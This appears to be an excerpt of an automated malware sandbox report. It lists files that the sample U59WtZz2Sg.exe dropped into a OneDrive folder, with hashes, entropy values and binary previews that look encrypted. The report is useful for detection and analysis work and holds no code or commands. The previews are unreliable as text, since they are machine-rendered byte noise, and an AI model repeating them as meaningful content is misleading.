MD5:	1785D3F7215353CD0AEBBF669425E18C
SHA1:	1B203BEE7D282FA5D04B147E01CAFD6B2609A590
SHA-256:	08881B24C02BEB5D19E4F1CBCEF64B92E065A5CB6CFA0821A441425FDE5BB2D1
SHA-512:	D9D0A185940A681ECDE5A8590D818112702E37F1749A28D0C5C6EDF27D0E56E0CA7BC35CBFA9900DB80C48523B953376B69D442CDB560D5C1BF4912AA7A6F882
Malicious:	false
Preview:	MZ...Xp%4.B~B.....bz.g.G...\|...x[5.q.P...o...r.....s.7=..X.......s..8y..1.........1n.!M)..o.7.~.....2..j....i....n.......nn.777]. ..40Fo.\|.....bw..hC....o.Q.USD..9K...2.>._..F.DP;.Y..9(BD.a...BH`.}.Ol.b...0.iJ.e.......L....mB..o_8..E.p...9...,.)w....kN.^..gu...S......8...0.r..i$UIV.G.SJ.Ob.Q..+.2.....<..p....D.u.2!.G..&b.u"...h..>._Ys$7M...F.n.b.....D)-.=:$\|..h.\..&4...z.l..\V7..a.Q....#Y"...x.2..W....:j!..]c.Q...%.x.O....m.E{oO..\r..........j9.........5]:Qp...&.....]98.B.xhqS.....N..K.WARMz.............Ovs5k..`.......7D.....~a.Ic..._..S.Xj..B:M...t.J,..Pr.w....^.U....dI.......Lm.s.AfV....B...JA.m.....j.62..m.<.Nu.....8a....3;".....x.`...MT.XK..=...0........<.(..6...@.g.&Q}.;Q.h.h.3s...2..e.Vz...!m9H...r.)H....<....B.6.?z.<C."4V...h..P..\|.t.....u.....d.(...;J..2.I...k... Q.t.N_....}%......f.a.9....GSj=.R...a..8i..,>$...%.4l.K....A.....\..v.a..k...F.....,.!.q......A/L..........."H.A.C.....+(...r..(.p..x.i..-4.....7..Qn\|.'..P'..1l

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\KFMHeroToast.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	13301
Entropy (8bit):	7.987184207386081
Encrypted:	false
SSDEEP:	192:ve58MfkVjyaqP7DfOnHJShu/jhkX23TJGCOn8JPO3V9XCF6nCDVaWsAyX9QgOLfb:veX8VjSsICTJGL8BOqYeaWetmLfubjS
MD5:	6F2CCD93EEE7E24ADDB998B6296BD1E7
SHA1:	3D5FD373FF2698ECB748887600B3B2CFE5A7CD01
SHA-256:	8785524C37EB31877CD2C3708C44D972317CEC5A440F5BCDF46A082AC770DDB4
SHA-512:	3C175E7063B6497E8E1450514D1BFA364F11F7EEFE7E6CB7BA652D12569791DF92E7D03C6F9CA97AA3A8C2AC30E7D31DED544CFA753B3ED8CE70C6621BA2D37A
Malicious:	false
Preview:	.PNG......3...q.w..!,)~s..H..9..-._M.....wh...}.u..;...b..Q2..k.j.....a..opQ.f.Qn.?z[.....<J.W.....p..L@.....y.w.,.^@-......{#.N...7....'..]KE....4...Y-SKZ.9(.w}U..&G.D.....JA......4Ml........X..N.af.AE..i.m.@L.......1....\.I.....X5./1..ng.dp^.6.t'F\.:..G...".rNkq`.~......D.TP.}6."..K.~M....K...j..!.{C..Y.i.t....Y>j...:/.m@f......u+.H.[K.-...v.c} H.]k..>..J..28`.>.iD0.....rF...............w.if.o...5..!w...(9.S.L.y...........@....R..T.N.$....T1..w...(...._.......Q(....m.A...0]..(.c7..t.....v.....7.....7.nd.......(....{@.Y.'e8.qi.0..Q.t-...d..../..5}P.$.\|.......l.^.....Z...[A...{B..A..$.f;"O..S.e..,.9@...6p.9...-.V....&.....=\|Y..4[..=.;...!j.t...Gk..R..9]x.n...O.....T8k..Z.J.iX`p.4m\...i...^.F4fT.].JS.._2.a;...fQ.....U..H....7l..E/..:.L..8d..Xv.s...s`0..hc......o.<.J{.3...?..l..).u.V.DM..53.Q.-U@54...U........l..n...N%q...s=..y...rQ.Ox8-....1...........1uc..E...E....bA.m.'.5i.......f.<...!}]_qI.....FFY>Q\|}Q".*.J.:..}G..L..../..6s..ie.;.vk0.......

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\KFMLockedFileToast.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	12516
Entropy (8bit):	7.984822736508687
Encrypted:	false
SSDEEP:	192:97LjES3565IuqobXyjVgZ3kJgDrwKUwbkR2nU+42abU6:93j1VgDyJgnD//S2np4dP
MD5:	33A719C5DFDA42DD94D337B860D61323
SHA1:	69705D5441B233357B590DE7D4E57800F15F3927
SHA-256:	C49985722D43CC0FEF9EB0DB84238F5D1AA72237C43F3A59D3CD84180A1C61AB
SHA-512:	D01F803F2415A70B803C7E00E4457B1235C4BA815D16D1BF4A874AF8C248A943F63E6742F8F72A9D351EC711EA335D19194E4FD5787067041316B0B9E49B156C
Malicious:	false
Preview:	.PNG..x[.q...;.5J....K..Y..&....3TwA... .`d.re..&&YQ..dT....[.`..4n../.k..w{>+...n0k(E....XQd....@GN...S..$.....+s..t#m...L......X&..^..?L..p.tp..A.....8..HW.P...n.U_KZ..N...w...........m.I(].....Scx..1....e.h..$.O+4.@...d.<.A.C.....+.4.a...!...b{%.\..Q..*.. ....zA../..-.......gF...e~^.X.7...@..M7.......{r..<..6.@.z.....".[..3..;n.<Y.X........61WJ.M.~Mx.w5...ay;...v..w.~.w.7..v.<.=.. ....8.D'....n.I..`....?AB3....'.E..w7Py..m.9...0H~.........A.....b..]..$U.h2.3.....X..1I.7.:.Q.......@Z"..2....3.g.P..5..3...-.G.4=-.=..SW..l4.K.wp..c+..._.Yc,.+...kKU...;..J....n.f>2=.~.t......D.........=6.u.H.....v....c...-'o5..-.K~+.%...2^....8.#.......x;..9u.....!..\......"../8.....~E.}..Y6[.v-$....8......Bm.>N .;(....-.....}.yQ.c]1.....>.>......@.....@B.....# .[...7M.:[.=.....6..vx....Gh.i.ZB<F>....>.{...._Iu4.......".$.....U.&.g..2.v..t...w(....z32.t.uz.O.....{Y&....SY4.....e....! .x...j.../v+}..m..@.......wv[.y.Ez...TR]..{.I..Sn;..GPd...}..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\KFMScanExclusionToast.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	10886
Entropy (8bit):	7.98359054804433
Encrypted:	false
SSDEEP:	192:f1Ev6XZDRnOUZUMPps3ltxVsJ6XnkmjEFEsHkmJe6u9vfaaRsWe1i38Sd:9+e9OOb+VLXn7jpHmJNWHaa7e1isSd
MD5:	52AA56A046AD5EB4FB0F8F8025467A5E
SHA1:	2375C53D3431FB5CDF6E0516980225A99439E0DB
SHA-256:	27ABF4C748E329466365F092D3033EDDD6EF8C0CC779ED6E6C1D5EBF62592100
SHA-512:	DCEB0A3EBCBF9A7DDF7D628D533B50D11D34D929BC0962E339F4A87FD5A64A4D05A303916D1D53BA7556EA064826801A842D8662A1FE5375AE58395FA1133729
Malicious:	false
Preview:	.PNG....;"...v.......B...p...........b..5F.h.xMU.u+....j.wN.}g....V.Wzs.%po..e..r.n...0M.P.6..@.u..#...G......X.1X.4..z.Zn..U.....p.p.KE..B....s.../2L.jx(.....d..U..\|.[..0![.....;Y..y.OPC...~.-...X....v.o.......Jc...t..u.....p.;}.\|@5...!6_.h.k.QBK...W.n.0........V..:=>?..0.R!(..Ri...?^...j0.H.....Q........,.2..LLF\|~.1....\|..]s.......N.(#...C.Gp.e..3Z$S...p..I..)k1..s...:d".B....=#.B.7.4........}..,P/..YF.vP.s...-....M......z..lx.(N....6H...(..;....m..G=m.....Ghs.3..=J..`%...f.-....F...Y.....)...t.,.....7v..n...O..<..}.Kh0.OuQ.-..eU.\.....0%.<~m....;i..]..5.Wm.t..V.\.q..K.!]..:Y..J+..FC./...........*....K.....D.. .N....E-S2.C^.....'.b#.yQ.}.\.=.....B\....J.....f..]b...an..T......k.T@......<.,.....)~.......k[............5;.ez.1.M...$.`.'.....".u.Ox.Py&..}..h`..4..._<]>.......1....qsn.....j<.-F..\U.....v}.7Pr.-.9....im..2.K.....z...c.tE...7....fh.....\|f...MR!....Ib..J...\.WN..3.L.nX..a.O...xy~...+Z._.T.2..0W.......$q..U.%.....d.UU.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LoadingPage.html

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	6734
Entropy (8bit):	7.973754753921928
Encrypted:	false
SSDEEP:	96:tn2z4Ee+CWJBGdvjWbIXEbbNhWLtA6UahySlPWGvqXywu0Hs9Oe+mXK:tn2zZTwNXwb25XUahTlOsqXy+Hs9vFa
MD5:	D6FF5E608AF4DDDAB9414D087BE8175F
SHA1:	26376B4E4F3188D8DADE0FD553B8E98614C314C4
SHA-256:	7679B07392185CD136E95A67D4CADBA6E80787B732FAB1A02707309A705EAC0E
SHA-512:	EE7974C5CE9DA80B7B0A532BC2EDEA988815F2DA14DDBF5B3EB3524D8330F948356A0B2E900CAB3972FFF386A80FF37388459BE5A4797AB5CC8AE572F8466999
Malicious:	false
Preview:	<!DOC_.pZ.p.Pi.t>.}... ....\|.W.0...GU.&.TFau.Z...........x..}.%.....}z....R.p...`....,{.p..V...Y.v...p-9y3Q...X.JuPS..&..j..Fe.j...2Q.....E..6h.2XJ......N..b.........A..js.Rp.P...Q..[.Kb....b*Fs.9F.d...W..0.w.\H.GfKg...GV./..~.A6%..G...ba..T.K.b..c...0.D.U..&.mj. ...l'.fbPrV........er...Q.L.......Vg...@}..#.p8u...P....i\|..-..D.....i..I..R....;....8..S...]-..2.......I...ju..z"A#\|d..0Z"=..7...E.{..'>....B.=,.>Y.}.~.6.6Ze.&8zX..P<..Qq.+{..6...I.. ..m.j.'..#.+..p..=;.t.........V..Y..&y...V;..V.......:......<.....m..:.f.6..........D6....s.QS.j.6&......31..0R.G,,...^.,S..Q9..P<..l..9AP(@....Qm.i.F.s...!C.Y!..(..%.....T.....^.v~......#.'b....... ...<tJO..y....R.D.\|E.`........{........&mk..".....dX..y.c.v...s._:0.2.."j.t8Gi....##.^...-...k..c.ja7.h..$B.p. .2.P<......jj...%h.....7../?:v....`M].,.v...`..+._..w...Dux...".y/.I...]DR.<q.....7..X.....0.....8......,~..c..i"......Q..a..` ..i.[...".......U..pQ.f.p{..9x/.nZ...........OA.$.U`S...U.b..\.%

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveMedTile.contrast-black_scale-100.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	986
Entropy (8bit):	7.803169010312835
Encrypted:	false
SSDEEP:	24:MaOTxdMdqbLyDzdc/S+/qfQJ8pEUqteA8xqbD:MD3MdHdc/n/qQ81qtmxID
MD5:	1C144A81CC5DD8CC4927AE58873DCC01
SHA1:	63BD5F20809BA857B1FF4A6C1BA2D428573A0E2C
SHA-256:	6B4BD2A1FC7056F25FAA74238358864DCB778AE27323DD7B2BF31E5B173D6E68
SHA-512:	BC62B212958B4FDC91B23D83256A9D345834B43D6CF5C7E22D80864E4099A77086AB4D0AB74CBB0FCAD32F2E790EDADCA424F9D1C86DBFA1F524F3B539CA1A4A
Malicious:	false
Preview:	.PNG..3...%./...;W>..................Q,No...j.a..h....[..J8V-....x...fo.~..@...5.....g.\...#..PO..'....U:........Ft4...~...-]$.U.Y(..R.....p...Xo...N#.`....Ko..-$..B..Q3.....Da#m...{.@ ;....}..s....>s...e.p/.,....`V'.s.y..vv.f....,A.I.....BM..m.*..]<@...L...'.....f[..b.!Y.#..S.xp..Yy...<isr.UN?..?....~......9..Wz....i.4(=L..8[.k8.J...RJ[.X...^u.T...!.GD......_E.R....6j(....t..~.Z....H.1.W..NM_.T.X..z;..WD.CK.%.w...vKU}Q.!.J.j."U.k.......7.d..\....?/.H..../x\.....krt....$..y.(.N........okuD.O..q....S..8.Y...-.....w...:...)oX.}..q.Y.fmF(.. W+HM..y&......w.....Y..6...5.U....oG..T?..d...Prl.....Z..p&./;.{F......%...t.1.].-... .c..s..%q.b..6..V...q}G...N..}4!....%.oa...W\|....N..(T....r..=....o.....S..C.&..j.>.S...wlW.E........dY........g^...e8.........6.Wy..&.)..f...^<.^.#,...m..^H.k.6...'nD.I..h....Z...gRC........'.w...T6.a..-:..D..)...g.d....K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveMedTile.contrast-black_scale-125.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1182
Entropy (8bit):	7.834416485813564
Encrypted:	false
SSDEEP:	24:qYFmYCREdr1I+blEiKzjOFCgFp7mnGW0O3CbD:IREdB9RpKXOXbW0OQD
MD5:	8FBB41EE622CF81883BD8E48A2C56839
SHA1:	2C7A55531BCBEBAEFEDC35CFE604C5F3D529A141
SHA-256:	3C5FEF22233734F6DD60749D9A1238879C53115ED8AEE9EFD93BE3018984DD99
SHA-512:	3BF60F27C0B25BD86BE96097A200D678903E21A1F01D17AC32BAE5EB250B8D4A8864D1505893DDCED9BB3D5EFAC102595421D6B2DCED32F288CFEEFECF4DFA8E
Malicious:	false
Preview:	.PNG.;._.Jg1..ko......'.V UbEI..W...u.jr...a.z~..g...L.6..w.=.../i.......\yg...'.RV.Z...e...\.pMrh._".7;...m.1.=..7(.z..B.07==..3.e....N.:u....j.G...%;...'..h.T{G.u....!..............W.9".&ok.Bp.M......@nL4.Q.:..Z^............]....%e....?.T...jC.B..i.....r....F$d......y..%.+D...9....`.(c...[..7;.........oP.......t.67H.<....x.a>....E.'....9.....s.y.......{'j...=..\.f%J.Y.....\|d..6.u_..o..j~'.,....zV.....8...A...Q:+._.KRc.6=4.e.<[-..MN.....9.`q....9<..XK.j......n~... ......g.~...vA... m..!F....Q.5....98..G.}w...E!RQ9.\|..._.(......Q.....'=5.......\|....n......~...a...;..KM.)4ymd.u.mK.?.6....V..P.m....2.r...T.x.-:g#...7...VDzy$.R.4.Yn....l.b."...,...I..D.{.,d.@.B.@.0.....Tt...f.0...rI.>\.V"t..1..xvz0...y..K.L,.t^\+5w....X.&.`..h.".....WnE(z_.G.75..$..U..5..rJ%...T&..!.GU.y5g.Wj_5..dSUB/9.....\|.......G?F.....A\.&a.De..P....cx..~...\|.Y..6....0....0.\.C...O+..P5b.d*"<.?.v...{.../.......xlR@.mdD...{$"C5G$.q.U.......K....(..yh..i..+&S.U..-.I.....!

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveMedTile.contrast-black_scale-150.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1324
Entropy (8bit):	7.8370571414327035
Encrypted:	false
SSDEEP:	24:GozXhUEek2s3lEeGhj7YDG0D6pauuPyudjS5A8poo5KElbD:GozcaBYj7yWRSjSVHBD
MD5:	D86CCAF28D9CFE7F509A9FE33C902346
SHA1:	2306DFBCC36A6AE13A8DE7DBC6ECCE48959461F9
SHA-256:	A4D488A60E7DB52B877747CA4FA290F4F784CFA49DA7CD8710DA155B88F5AA0A
SHA-512:	0BFD9B4A033944011365CB208EF51B130ACFC55CC8DA8208C51CBAC7496F631A0E0CA10C4B2494BE39B4C938C5B0C2FECC289DEF83425D700FDA0DB5D2A86AAA
Malicious:	false
Preview:	.PNG..Uf....C...5.!..u...ug....#\...j.Y...D....C.".8.\|.....m....h...y.=..6.a....k..G?..\|...M.p.....X.T...F".j.j3V./#..V.\|.WAV...0.......~...1...]j.m./..%._c.@..'Cl.(....T)X...-.......D.o...B...X9.=...R..".HL..Y.$....w..R...W..U.k....h R...O.0..P..d4.=.$.W."^.....9..<..f..]..d.....,.9..c..^...%.3........`+>!.].........I..Uk..u....x..}^.....J..3....G\|(:...I.~...._...U9G:.CDn.6..h..UR>........6......................4.y,.S..XQ.^w5..[..N..uh-j..^.:......C..2..W.M9...........JLv.PxWz...9.H.2f...Eb.&.U....cy..l.9..../v.F...N...,.v.:......By"...,.j. @.......;.j@.v7...e...v. ...2.S@~2qe.L......#-.....6..W&.7..1..._Ia...P.A..S...:....w.^Y.w?.v.....Q..).<.C.5f~..u.....w;R6';....t.v....~..t.......$ue.y.3.~...Z6X..6.a.s_...S.zC...c.z.#r\.1..c.x.H....RB..f..mS4B.....w.....UV."H.....#._l.c5.~.w...\|..-.^....@F{6u.F.<...d1+...[6eTb..l....Of.P/....u......jk.....[......,T.H.8q...{B...&x...Kt.w.q.G.....*%t0.J.(Bf.8..\|.Z..2..m.>ih......j.n.G.~-.....h.....,.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveMedTile.contrast-black_scale-200.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1726
Entropy (8bit):	7.880582033897502
Encrypted:	false
SSDEEP:	24:74bUnLeNZBLgJiAqafmOZmgsrDCbeXoNJ3BfazJ0xq7519uLRT/T0GIAVQ+pLamX:Ubnfg8AVmOlsrDR4JRazJ0k7U/40D
MD5:	B616DF4779E9B29D64EFA8F7F20752B1
SHA1:	BF00D0A3FA267DD1B326EB5D7A6E382AD9836B72
SHA-256:	DBC17D8EB5B7F65734D2F8E471A647FD070B7CEAED14AF09237376C1C139D1DB
SHA-512:	910AC35250C216004D0ECA1365384533368D129F148C86745665CE5FD2706A0D43055479B930491CE54E4744CA8D67B51E4A41B6068E0CB6E40F33464ECB612E
Malicious:	false
Preview:	.PNG....B..R.2RV.?,.\|..T..A.B....&...\'..W.{...].;D\|.X(.i..N.f.....z....5w...'J......r.y....5..a..w....-$vE8.$.9.e.....q=...E....m..J...u..0ig....wtt.G..f...$.7h\m.FqGe.V.=h.s..o.[.m..!..$\|}..+.U.iSb.l<e....y4".~X\|o!.a....Y..UU.ik?b.n..#,..$.uyMr.<.6._..Z...\)......e.6...1._.q:t0........"........j.e..2.@..$.c.`6G....3a.O.......q.z..]:t..,..j...hf...W.WEI....C=..`/.!&X....~'..Z....VLi...tJ.. .....I..v.v=.._......G.l..m@?..R...k....G4......g.2...Ak.^..F.:....h..%..r....b....V.........[B".T@a}3T].t.V...&...B.e..y..I..;\.#.l.....gRZ.).{.(n..R...$Ou.#.SiY..w..~..I\|.LS=......s.\....Re[.qe...f..`J.z.......L .C.H.cI.D....o..xM....kC..8S8......\..Y...Xv..83.s.2............i.1.....V...y,c<&Y....(FA^....^O.....l%.W\....&.x...........T.....:... ..yh.MZ.f..D..S.V<.......2l.f..k..`$h.5....:E&..*D5...(......b{G.((5..v.7...t.E...6n\|.c....8-.....F..;.@..!.W.Q......CQ........Yw......tE.5`f5~l.\|M..y........Y.J@........./.^......diY..~..H.....H...p.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveMedTile.contrast-black_scale-400.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3560
Entropy (8bit):	7.938857265299592
Encrypted:	false
SSDEEP:	48:1a13nS2HXzeCiSyzHqQa9tBWUuON2/9gWMxtzEtvqomlAh5zY1OtqQ1xSzIIm0Gh:1athHypSgKMPCXzEtvFmmBC4PxSsIGh
MD5:	C6B3E6018652615FFF3C62447E46AF83
SHA1:	509681F3EEB35AE8B4680763E474910DB683F021
SHA-256:	41412E09EB845CE0C451E1E543FC71E62786FAF0272C3BBFF5F136D62DA07B82
SHA-512:	75FE38D41FBD4ACD0CFFAE77F29275E1D2BD17BE1E6FDD47EB464FC102EA5537F825AC0E841661EA4F340BABA90237029193F2B641B946009B6A4345B0201048
Malicious:	false
Preview:	.PNG....W.@.f..7.G.!?.jd6.8....VN.J.u.E.s.\...3.Zx.Y..u....t)...:....H..zi...Y./..+.j....D."..A...........]3=....7....r...H...........N..n...W.B.5@......R..)...y0Y..#?.'.G.4...)K."..P.\....c......R.....yF...1...4.T(i.X9\|.3.O.P}.....4 ..b..Z4JNgN.-&.a...f.$dy..9.,..@.w...(..G..J.wB....(B..h^}..G. .T+\|....S....p\..f.^Z...S'ntk..v..P..Ta.>4&..I.......d.`.?....iE........l.[..w}..H:....P.+.Y's......}.q.....ZN/..T.n.b..hw_..D.i.a..>1....b.....^.0M{.,e.7.d.k7mNr."t....bg.:.0.....#ji..$....S...\|\|=!CC&..s...`..fe<...o4=....cTc.u....4s.........o.........FG.+WPO&@:{.;.....~..}X9..KI...r..a1Z).m.7m&.}.3..Y{..Q....~m.....@N.!.0WiG}..j..'.p.. .[...f...G....`...E`......&.Cao..x.o.R...0.?C...HO.#....e...O+[.>Q+.D.......&.K.].....a.].c.6......+.1l...Jj.......Q..A.{A...0....Ub.E.xX..e.E7@.$....p...3...i.~....p..3........@1....}.`-.?...~&.C..C..o?&H..A.....^..=......&..Q..j.L4..8(F.{...>o.S.N...r...../f..].!......=......+[.g...... c......0.qD..x2...^

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveMedTile.contrast-white_scale-100.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	996
Entropy (8bit):	7.799626580489661
Encrypted:	false
SSDEEP:	24:2N50Iyvv8lFISAZ9GTFdkosmXJEWaxrFshZFKHpbD:2NmVWFST8LTsgnaxWkHJD
MD5:	310B4E025EFD59B75E97ED08B6F682DA
SHA1:	7F0348B1760347CEA9189DFB0209F99BD1347172
SHA-256:	3FF76BBEE950F47BFD3E83E438B81ECF3A7EC53D3E3B48D73625DC46DF3B5068
SHA-512:	6A7A0E0DBAD2A27BCE2A369A767BDA737C561C3CB200AFCEE80820BCDF0B9832448B5B2B509CA56E3E2BAC820D3129A66884B02BA29670CE28469A03733C1720
Malicious:	false
Preview:	.PNG...C.I....w,..'.Q........].?...7mX....G;.I.S.3.TNG..^1.....2..E......e=...;{a......d.YI.K..:..k..6.%.'2.3.cC...5....F.......]4.*..jM.uS......- .\7<......z....NW...[..m.....#.......3.J.I.....f... a........\|.uF....e,-5........J.......>..(T~..r.........9.}..O2.x.$.1.s.L....E...O."..\|...7.&p+...).U...;..f`.P.4m.T.......\|..3.....D.[<..xwg\VN.0...F...j.lefR.....Lb>.O.E@.".....B.D@.;...wH."S"9.(PUJK.0.r......i.{.bb)A..zZ.t%.....^..X..x...)$5....9...aM...!..!.....<.5Fq..[G...j/@.B..p.b....HY..ihT..,TL......l..']..........e...... ^...4.t......D.N...R.5M..QnW..%...q.....!8..~.{..u1.......a.J..b!.'..1.l.@.H..Q.V;...s.D...H++....].HL..yj.R..c..4.......ZU..2.M..wR.:CHK!M?.n.F=...L..........\|..f.../M..M....5........w.H+/....f.:..Mjw..0mI...y ....1.S7./.i.C%)........(@_,.Q...p.k.....d"2............q../..l$\|...Fs.......OI...o...M.".-;`.L.t.m$K.......S-.`oam.j.'...lU.........e.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveMedTile.contrast-white_scale-125.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1205
Entropy (8bit):	7.824535987248569
Encrypted:	false
SSDEEP:	24:45x1U9KpaNSQdsH/lKUEl33D8naQNT8TlJuuNrSB5umeFw+SZ5ibD:45xiw6IsPlj8aQN8v3NrZ9w+SZ5wD
MD5:	36F1FC2100FE6480BC600CE81A0CF11B
SHA1:	C620435A542FB199435BA84F2DC489AA0D077C7B
SHA-256:	ADE69B7355F56EB5EE882A3C63A2085EED048D94E9DC3F41E67861F705137F0B
SHA-512:	1FABE3D784401912A9AECE4E79FFCF05CCE7E0F5B17729B78CFC736C6A94C34C2F8AB34FA1A35F45D1E3C9AAB5A778BCBF926F1AADA421CDF51900B685DD5B6F
Malicious:	false
Preview:	.PNG.(j'G.....]~........vvq..../.....&#..S+.....86#.x.7.../.4.C.~.....U.!CdJ.F..F^....T.@.Pk..!.u7D...`.`..+..O.}.>76=.l...VRZ\...Y.@Y$..E..U.........=d.~[E.r..CdqVm...Rh&H.(......bT....d...uI.........t#7.....B...`...........h..:Y.r.%&..X.O...!.u........?..2../.l.....L....\...Z....7..D.ct(...R.)Q!..;....5.."...Ibs4.j...?...-J.....X.F..-.A....W..$yV....r.........p.......Q.;..d....S. y.]ky......F{R.?...`._.P...k..f........t.1..6.fv.!V..v^..C...7<..B.H.....\.)<ruVT:........Gx...x.%...hV................'.k.....T&.7jG....^:.......%b.s..K..b.......F~N..!DL.-n..?A......&.....h.qa..H.H^.a..X......5^+\..K.0y..-8..@q}s......../...O+a6......!\.}..3Yy.Y$...R.).....&).N.C.....`"/....WN[.9Q..F.eY..c. .) ..Q......9./mU.(.4J.QNc..E9...3.K@O]U0osB..[1<...v..>..=.h.R............K.A.t.AV.y...T...+....y....%........S.9.U.^../a..$.....?.\..\|E....\|O..W....M..../.t.&.9i(.4.......]......R.@..... ..(So.K.".O.5...s.J..q.l.j......=..P...Q]L.K"..b.8...1._w...!.\(=

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveMedTile.contrast-white_scale-150.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1134
Entropy (8bit):	7.795476209299535
Encrypted:	false
SSDEEP:	24:SHEnIar78O0WKhcCRekLl/O1VcX5DyDAsbD:SHo//Kh/ReSl/O1+XVydD
MD5:	9401AC4DE0D8A3327415F3B26C91A413
SHA1:	8EFD42A40EC95763F9A1C857291150621FDB8514
SHA-256:	09E24CC16C8B9206D1C609D3F48D3C943691665843F091562D2E29A1550365AB
SHA-512:	675EEBC7779E62C10675535E7ACA793422DE33207F44F21369A28ACCC70DC528C0ADBC035DF742F87C479C1BAA7523D1D561DD27958DFE937362E3636180D164
Malicious:	false
Preview:	.PNG.4-...Z.B.H......m..4c..@....L.....g.<j..m....4A.{SW..y.n..._{.....?...-....&..O.ZBQ..m...=4M...5........u..<.=s......8....a.92..1...yv.:.e....<.@%.G...z,].,Qg_.@+....(..I....0s..f.....7.\|..z...+..";.....2...\|8..t:..<..,=G... ...o..m1.......{t>...J.?M>!1l.V.......<J...J\.....B...P~V.l..q\|..y..hQ.p5.m.Xp\|..=..g.-.....}hlt.....;...j..G.xjI...q...L..p....C+..Y.,h.uE..v.&......k...v.y..og].E.C.......0.7t..X..02X.Y...'...N..[...`c...Q......@`...{3?.....Zq...O....C.%.j.a.(..^..Jv..).7.I0..e...o...}.V.'~gK}LX.jF...>.N.N...g...u.....}.XN....nd..r..X.9[.-T.3~..Q..5Z._.....c../\.3....DC<R..G;.F^\|.(..$..x.rC..@.3x.m.C.t..b.<s.\..&...w.C]lP.....f.-.`.bT.Q.!BG..w,.6....Z...if[.....E...t........L3...T)%....n..xx..g.)........e..1Jp?......n.Yj=.4.....I2...r.D..1<."G@`01.2}.h.tK..hj,.g.Pn............n..+........<..s..7...W.......h..s....t..t.1A..6.=h.b.l...F....1...).!_...T...'(ME.%q....c.........e..^..)G....f5..\|.Z.+]>.b...$<..Cb..70.4..w.hY

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveMedTile.contrast-white_scale-200.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1827
Entropy (8bit):	7.889292603731893
Encrypted:	false
SSDEEP:	48:HeTY3EbjtHGCB6nGAizURMKADgh+0xTDBO2/rRD:+M3EnL3AODlcDo2/d
MD5:	565880FD65663447866E62CF023D2C99
SHA1:	D669E555C107CA3FCECC75D864A22BA136FB1753
SHA-256:	140F71FD4D6D8BCC9BB19240CFC4E796C79C14EDD781308F8988637AAF35D007
SHA-512:	FAD2FF441724F143354AFE5B9928627D3C57A29C3F607809EC36205DAF6613593C9E2797D4AA1A8CEBB1F9D1527D9F3F4F1316CCC7FE1D398F975498D66C36C2
Malicious:	false
Preview:	.PNG.'.eZ....t[NS.Y.$.L..a..N.....}..Z.........%...w$#.1s.rF..F..G.Q@...1..G.._..O.?.51\|...0.\|$.....`&.qm.....ki.N....c......Bq........a.;F&YH.t...o..tCX.RP.K`.>.."..f..nV......No.1....IQ..._zT.[..0h...Dv....lyE.ZEa...FPT.S...d.?.vd1..D.=2O......M.......O.....z...]..X..b.}.aU;..o.u."..#..e......$.];R......(....?.....S....C.`.o.q$.'X.=2j8t:!N..\`VK.....{....Z.w...J...R........n.Z...J?....j.[..Gj.j.\|..Cxg....B.Zj.,.......3/ m.-.V..u..~.ced..E.B..b-..._.s.31\..t)z...h..i..C2...0..4.PKw..SsS}J.>X.R...s[m4...[y....!ACy.Q.w.'Y...%.wT.. ...vFzZ...f......Ss..r&..f..[.,..S.z.....\|.QS.e.T........T...'.v._%....B^29.w....^..1.....R3zl..A..X.r`...'.k....".C....UN\|..n..\|zg.9. L+t1qjz..K...}_/...`I....~...............w..a8K.....2.-.k....Q..,T$-.S.%.\...$ph....kL.R.'D..US...'..I...1.t..,.......Ky...Z..Z......E..Y....Y.=tz.!....g.....L.=..'.A..6h.t.y.....e.2....;OeC).........u(.....#W.\.......[......NJw..@fM...........Y...e9.K..!*..Fa.N:v7R?...g...B.....

